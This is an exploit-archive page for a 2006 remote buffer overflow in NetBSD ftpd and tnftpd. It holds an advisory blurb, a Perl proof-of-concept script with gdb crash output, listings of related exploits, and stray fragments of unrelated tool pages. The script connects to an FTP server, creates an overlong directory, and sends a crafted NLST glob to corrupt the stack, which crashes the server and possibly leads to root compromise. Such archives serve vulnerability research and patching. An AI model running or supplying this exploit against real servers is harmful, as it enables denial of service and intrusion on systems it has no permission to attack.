Menu

Search for hundreds of thousands of exploits

"NetBSD 3.1 - 'FTPd / Tnftpd' Port Remote Buffer Overflow"

Author

Exploit author

kcope

Platform

Exploit platform

netbsd_x86

Release date

Exploit published date

2006-12-01

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
source: https://www.securityfocus.com/bid/21377/info

NetBSD ftpd and tnftpd are prone to a remote buffer-overflow vulnerability. This issue is due to an off-by-one error; it allows attackers to corrupt memory.

Remote attackers may execute arbitrary machine code in the context of the user running the affected application. Failed attempts will likely result in denial-of-service conditions.

#!perl
# $$$ NetBSD ftpd and ports *Remote ROOOOOT $HOLE$* $$$
#
# About
#
# tnftpd is a port of the NetBSD FTP server to other systems.
# It offers many enhancements over the traditional BSD ftpd,
# including per-class configuration directives via ftpd.conf(5),
# RFC 2389 and draft-ietf-ftpext-mlst-11 support, IPv6,
# transfer rate throttling, and more.
# tnftpd was formerly known as lukemftpd,
# and earlier versions are present in Mac OS X 10.2 (as ftpd)
# and FreeBSD 5.0 (as lukemftpd).
#
# Description
#
# The NetBSD ftpd and the tnftpd port suffer from a remote stack overrun,
# which can lead to a root compromise.
#
# The bug is in glob.c file. The globbing mechanism is flawed as back in
# 2001.
#
# To trigger the overflow you can create a folder and use the globbing
# special characters (like STARS) to overflow an internal stack based
buffer.
#
# gdb output tested on NetBSD 3.0 i386 NetBSD-ftpd 20050303 :
# (gdb) c
# Continuing.
#
# Program received signal SIGSEGV, Segmentation fault.
# 0x00410041 in ?? ()
# (gdb)
#
# tnftpd-20040810 behaves similar.
# FreeBSD (lukemftpd) and MacOSX (ftpd) were not tested,
# however they could have the same bug, because of the same
# codebase.
#
# The problem when exploiting this kind of bug is,
# that we can only control 0x00410041, not the whole
# 32 bit. However it looks feasible to find a way
# to do a hole EIP redirection and/or exploit
# the bug the "unicode" way, which could be especially
# hard on BSD systems.
# kcope

use IO::Socket;

$sock = IO::Socket::INET->new(PeerAddr => '192.168.2.10',
                             PeerPort => '21',
                             Proto    => 'tcp');
$c = "C";
$a = "C" x 255;
$d = "A" x 450;

print $sock "USER kcope\r\n";
print $sock "PASS remoteroot\r\n";
$x = ;
print $sock "MKD $a\r\n";
print $sock "NLST C*/../C*/../C*/../$d\r\n";
print $sock "QUIT\r\n";

while (<$sock>) {
       print;
}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2017-06-28 "NetBSD - 'Stack Clash' (PoC)" dos netbsd_x86 "Qualys Corporation"
2016-09-15 "NetBSD - 'mail.local(8)' Local Privilege Escalation (Metasploit)" local netbsd_x86 Metasploit
2010-05-18 "NetBSD 5.0 - Hack PATH Environment Overflow (PoC)" dos netbsd_x86 JMIT
2010-05-18 "NetBSD 5.0 - Hack GENOCIDE Environment Overflow (PoC)" dos netbsd_x86 JMIT
2006-12-01 "NetBSD 3.1 - 'FTPd / Tnftpd' Port Remote Buffer Overflow" dos netbsd_x86 kcope
2002-04-03 "NetBSD 1.x - 'TalkD' User Validation" remote netbsd_x86 "Tekno pHReak"
1998-06-27 "NetBSD 1.3.2 / SGI IRIX 6.5.1 - 'at(1)' Read File" local netbsd_x86 Gutierrez
Release Date Title Type Platform Author
2007-01-30 "Sun Solaris 10 - ICMP Remote Denial of Service" dos solaris kcope
2006-12-01 "NetBSD 3.1 - 'FTPd / Tnftpd' Port Remote Buffer Overflow" dos netbsd_x86 kcope
2006-05-29 "Alt-N MDaemon 2-8 - IMAP Remote Buffer Overflow" dos windows kcope
2005-07-19 "Alt-N MDaemon 8.0 - IMAP Server CREATE Remote Buffer Overflow (PoC)" dos windows kcope 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected